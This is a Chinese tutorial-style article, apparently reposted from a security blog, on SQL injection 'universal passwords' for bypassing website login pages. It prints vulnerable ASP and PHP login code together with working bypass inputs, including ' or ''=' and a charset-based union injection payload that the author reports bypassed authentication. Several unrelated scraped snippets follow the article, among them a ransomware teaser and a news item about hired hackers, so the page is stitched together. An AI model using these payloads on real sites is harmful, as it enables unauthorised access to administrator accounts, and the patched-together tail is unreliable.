对于过滤了单引号或者做了post防注入的 站点,此 *** 也无能为力了;但对于很多对登陆端没做处理的网站,此 *** 值得一试,尤其是你已经知道源码了却不能执行命令(ACCESS数据库)或者对方能 报错( MYSQL数据库)。
首先我们回顾下老的万能密码or漏洞的实现机制,先帖一段asp源码:
---------------------------老的存在or漏洞的asp代码----------------------------------------
复制代码代码如下:
username = request.form("username")
password = request.form("password ")
set rs=server.createobject("adodb.recordset")
sql = "select * from admin where UserName='"&username&"' And PassWord='"& password &"'"
rs.open sql,conn,1,3--------------------------------------------------------------------------------------------------------
将表单中的username和password数据分别赋值给username和password,执行
select * from admin where UserName='"&username&"' And PassWord='"&password&"' 语句
但如果被赋值的username是 ' or ''=' (password任意填写)则SQL语句变成了
select * from admin where UserName='' or ''='' And PassWord='123'
''=''条件成立,则语句成功找到管理表里首位的帐号身份验证登陆,因而成了or漏洞,除' or ''='以外,'or'='or' 啊什么的都可以,于是早年or漏洞形成了万能登陆密码。
针对这种or漏洞,很多asp站点进行了改进,改进后的源码大致如下:
---------------------------后来经过改进后的asp代码-----------------------------------------
复制代码代码如下:
username = request.form("username")
password = request.form("password ")
set rs=server.createobject("adodb.recordset")
sql = "select [password] from admin where UserName='"&username&"'"
rs.open sql,conn,1,3
If password = rs("password") then
…’登陆成功,文章来源:http://www.oldjun.com/
End if--------------------------------------------------------------------------------------------------------
现在很多asp站点的登陆页面都是这么写的,如果是mssql,还可以执行SQL语句;但如果是ACCESS,很多人应该都会望而却步了吧?其实在没有过滤单引号的情况下,我们还是可以用“万能密码”登陆进后台的。
下面我们进入主题,讨论新型万能登陆密码,以php代码为例,由于字符集编码的问题,管理登陆端可以注入,先看源码:
-----------存在字符集漏洞或者magic_quotes_gpc为off的php代码-------------------
复制代码代码如下:
$row=$DB->query_first("SELECT * FROM admin WHERE username='$username'");
If($row){
if($password!=$row[password]) {
…..//成功,文章来源:http://www.oldjun.com/
}else{
echo "用户名或密码错误!";
}
}else{
echo "用户名或密码错误!";
}--------------------------------------------------------------------------------------------------------
由于字符集问题,我们可以注入,但由于回显都一样,所以猜不到数据。根据错误提示,我们发现管理表一共6列,password在第三列,于是我们构造如下用户名与密码:
Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
Password=1
带入登陆框,sql语句为:
SELECT * FROM admin WHERE username='-1蟎' union select 1,1 as password,1,1,1,1
前面的用户名肯定不存在,于是select出来的password就是1了,就等于提交的password了,经测试,成功绕过验证。
随着韩国素媛案件凶手即将刑满出狱的消息在社会上扩散之后,人们除了关注这个禽兽不如人凶手之外 ,素媛案件原型的小女孩也重新受到了大家的关注,有的网友担心素媛案罪犯出狱对女孩会不会有影响,韩国媒体也报道了...
概? ? 况 近日,美创室验室依据勒索病毒威胁情报,发觉了一款新式的勒索病毒,这款勒索病毒应用了高韧性代码混淆方式,会改动桌面背景,这类技巧与以前的GandCrab和Sodinokibi2款勒索病毒...
越来越多的人说做淘宝客的人傻,其实并不傻,相反这还是个很好的项目,不少人都发了财,操作模式也非常多种多样,如果你没赚到钱那是你傻,别人并不傻,我们一起看看怎么回事吧。 为什么我说淘宝客...
微信公众号用户: 近期,部分商家无视平台规则和用户体验,屡次利用朋友圈“集赞”,甚至出现预付邮费欺诈、骚扰用户现象。为保障用户体验和利益,6月9日起,我们将升级全新技术手段,采用技术+人工举报的方式...
很多人不清楚EV屏幕录制怎么设置悬浮窗的清晰度?今日为大家产生的文章内容是有关EV录屏设置悬浮窗的清晰度实例教程解读,也有不清楚小伙伴们和我一起去学习培训一下吧。 很多人不清楚EV屏幕录制...
技术专业网络黑客先办事后支付3(完全免费网络黑客工作人员联系电话)武汉晚报6月21日讯(报道员李家国 新闻记者向清顺)夫妇“自主创业”开过俩家电脑服务企业,事实上干的是与100余网络黑客强强联手执行互...